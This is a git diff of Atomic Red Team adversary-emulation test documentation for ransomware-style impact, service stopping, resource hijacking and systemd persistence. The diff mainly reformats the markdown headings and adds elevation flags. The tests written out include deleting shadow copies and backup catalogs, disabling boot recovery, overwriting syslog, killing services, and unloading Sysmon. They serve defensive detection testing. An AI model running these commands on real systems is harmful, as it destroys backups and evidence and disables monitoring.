@@ -27,8 +27,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 vssadmin.exe delete shadows /all /quiet
 ```
@@ -40,8 +39,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wbadmin.exe delete catalog -quiet
 ```
@@ -54,8 +52,7 @@ This technique is used by numerous ransomware families and APT malware such as O
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
 bcdedit.exe /set {default} recoveryenabled no
 ```
@@ -74,8 +71,7 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
 |------|-------------|------|---------------|
 | file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 sdelete.exe #{file_to_overwrite}
 ```
@@ -95,8 +91,7 @@ To stop the test, break the command with CTRL/CMD+C.
 | overwrite_source | Path of data source to overwrite with | Path | /dev/zero|
 | file_to_overwrite | Path of file to overwrite and remove | Path | /var/log/syslog|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 dd of=#{file_to_overwrite} if=#{overwrite_source}
 ```
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index 3238fd91..6588ced5 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -26,8 +26,7 @@ Stops a specified service using the sc.exe command.
 |------|-------------|------|---------------|
 | service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 sc.exe stop #{service_name}
 ```
@@ -44,8 +43,7 @@ Stops a specified service using the net.exe command.
 |------|-------------|------|---------------|
 | service_name | Name of a service to stop | String | spooler|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 net.exe stop #{service_name}
 ```
@@ -63,8 +61,7 @@ This technique was used by WannaCry.
 |------|-------------|------|---------------|
 | process_name | Name of a process to kill | String | sqlwriter.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 taskkill.exe /f /im #{process_name}
 ```
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 6bec9449..e9102c22 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -28,8 +28,7 @@ Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomw
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 vssadmin.exe delete shadows /all /quiet
 ```
@@ -41,8 +40,7 @@ Deletes Windows Volume Shadow Copies via WMI. This technique is used by numerous
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wmic.exe shadowcopy delete
 ```
@@ -54,8 +52,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 wbadmin.exe delete catalog -quiet
 ```
@@ -68,8 +65,7 @@ This technique is used by numerous ransomware families and APT malware such as O
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
 bcdedit.exe /set {default} recoveryenabled no
 ```
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 5f2865d3..2aa909c4 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -18,8 +18,7 @@ End the test by using CTRL/CMD+C to break.
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 yes > /dev/null
 ```
diff --git a/atomics/T1501/T1501.md b/atomics/T1501/T1501.md
index 94e49ede..7577b808 100644
--- a/atomics/T1501/T1501.md
+++ b/atomics/T1501/T1501.md
@@ -39,8 +39,7 @@ This test creates a Systemd service unit file and enables it as a service.
 | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
 | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 echo "[Unit]" > #{systemd_service_path}/#{systemd_service_file}
 echo "Description=Atomic Red Team Systemd Service" >> #{systemd_service_path}/#{systemd_service_file}
 echo "" >> #{systemd_service_path}/#{systemd_service_file}
@@ -74,8 +73,7 @@ This cleans up the remnants of the SystemD service unit file creation test.
 | systemd_service_path | Path to systemd service unit file | Path | /etc/systemd/system|
 | systemd_service_file | File name of systemd service unit file | String | art-systemd-service.service|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 systemctl stop #{systemd_service_file}
 systemctl disable #{systemd_service_file}
 rm -rf #{systemd_service_path}/#{systemd_service_file}
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 5215f879..5f39b7cf 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -5712,6 +5712,7 @@ defense-evasion:
 default: SysmonDrv
 executor:
 name: command_prompt
+elevation_required: true
 command: 'fltmc.exe unload #{sysmon_driver}
 '
@@ -5740,6 +5741,7 @@ defense-evasion:
 - windows
 executor:
 name: command_prompt
+elevation_required: true
 command: 'sysmon -u
 '